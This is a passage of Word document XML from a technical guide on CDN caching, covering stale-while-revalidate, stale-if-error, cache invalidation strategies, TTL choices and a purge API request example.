      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> For a 500 KB page that rarely changes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668BEBFB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1251"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Without revalidation: 500 KB transferred every TTL period.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E8FA71" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1251"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>With revalidation (304): ~200 bytes transferred (just headers). 2500x reduction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DC7700" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5 Stale-While-Revalidate — The Performance Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CE0C73" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C05C43" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1252"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>TTL expires → next request must wait for origin response (cache miss latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A050EE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1252"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Even with a 304 (no body), there's still origin RTT delay (50–200ms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424D8517" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1252"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>User experiences a latency spike on the first request after expiry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F799E6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How stale-while-revalidate works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD7DE86" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7780AFF0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cache-Control: max-age=3600, stale-while-revalidate=60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEA94A8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2855BE49" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Time 3600 (TTL expires): content is stale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C71B468" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Time 3600–3660 (within stale-while-revalidate window):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3122FB55" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  - Serve the STALE content immediately (0 latency to user).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2610C7F8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  - Simultaneously trigger a BACKGROUND revalidation to origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD431A2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  - When origin responds: update the cache entry (next request gets fresh).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23810B11" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  - If origin is slow/down: user already got their response (stale but fast).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28923E5B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="0D6EDEDC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Time 3660+ (stale-while-revalidate window expired):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7168616E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  - Must revalidate synchronously (user waits).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6EAC0D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Users NEVER experience cache-miss latency for content within the SWR window. The cache refreshes itself in the background while continuing to serve instantly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCB4890" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is used extensively by:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Cloudflare, Fastly, Varnish. It's the single most impactful directive for perceived performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAB8DFC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.6 Stale-If-Error — Resilience Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2972D5F0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3586266A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cache-Control: max-age=3600, stale-if-error=86400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767C7C42" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>If origin returns 5xx error (or is unreachable) during revalidation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B7E252" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1253"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Serve the stale cached content (up to 86400 seconds = 24 hours old).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49721E75" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1253"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Better to show slightly outdated content than an error page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0750F6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This makes the CDN a resilience layer:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Even if your origin goes down completely, cached content continues to be served for the stale-if-error duration. For static sites, this can mean days of continued availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B9BAC5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="78AB7615">
          <v:rect id="_x0000_i4686" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="013EE366" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Cache Invalidation — The Hardest Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A66CA3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Why Cache Invalidation Is Difficult</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA285FA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The challenge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FAA82D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1254"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Content is cached at 300+ edge locations worldwide.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4312B6D1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1254"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Each edge has its own independent cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFC3C21" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1254"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>When origin content changes, ALL cached copies must be updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9B8D69" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1254"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>But you want this to happen FAST (seconds, not TTL-duration).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8CE3AA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The options spectrum:</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043"/>
        <w:gridCol w:w="2804"/>
        <w:gridCol w:w="1640"/>
        <w:gridCol w:w="2863"/>
      </w:tblGrid>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="5D40C67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06C786" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Strategy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21468F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Speed of Update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9C9E7C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Complexity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78E046" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Bandwidth Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="37D959E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0B297D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Wait for TTL expiry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435ADA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>TTL seconds (minutes/hours)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01511D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>None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9178F0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="43D4896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5A5D57" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Purge (invalidate)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BBA075" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Seconds (API call propagates)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0777C8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Low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8AEDE0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Moderate (miss on next request)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="1227A85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A75ABA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Instant purge + push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508183" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Milliseconds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8566AB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>High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C06D24" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>High (must push new content)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="45E177F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71D62B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:lastRenderedPageBreak/>
              <w:t>Versioned URLs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31EAD1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Instant for new URLs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0A1A70" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Medium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A4EB3F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>None (old version naturally expires)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75C46C1D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 TTL-Based Expiration (Passive Invalidation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B747A84" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Set appropriate TTL. Wait for it to expire. Content naturally refreshes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8CD5AD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEDF868" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Static assets (images, CSS, JS): max-age=31536000 (1 year) + versioned filename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035F8E38" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>HTML pages: max-age=300 (5 minutes) — accept up to 5 min staleness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DFA50F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>API responses: max-age=60 (1 minute) — acceptable for most non-critical data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CBD218" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The tradeoff:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6747AB8C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1255"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Long TTL = great performance (high hit ratio) but slow updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438D08FA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1255"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Short TTL = fast updates but lower hit ratio (frequent origin fetches).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149E46F9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The sweet spot depends on content type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1715845E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1256"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Content that NEVER changes (versioned assets): TTL = forever.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F83CFAF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1256"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Content that changes rarely (product images): TTL = 24 hours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC335A0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1256"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Content that changes frequently (stock prices): TTL = 5 seconds or don't cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ED3F26" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Purge (Active Invalidation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159C70BF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9DFDFE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin calls CDN's purge API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2125D25E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43041280" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>POST /purge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4694BD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C4E124" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  "urls": ["https://cdn.example.com/product/123.jpg"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFDEAAF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2115C9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN propagates the purge to all edge PoPs. Each edge marks the object as invalid. Next request = cache miss → fresh fetch from origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4DB489" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Types of purge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0313B08F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Single URL purge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256907B0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4958A515" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
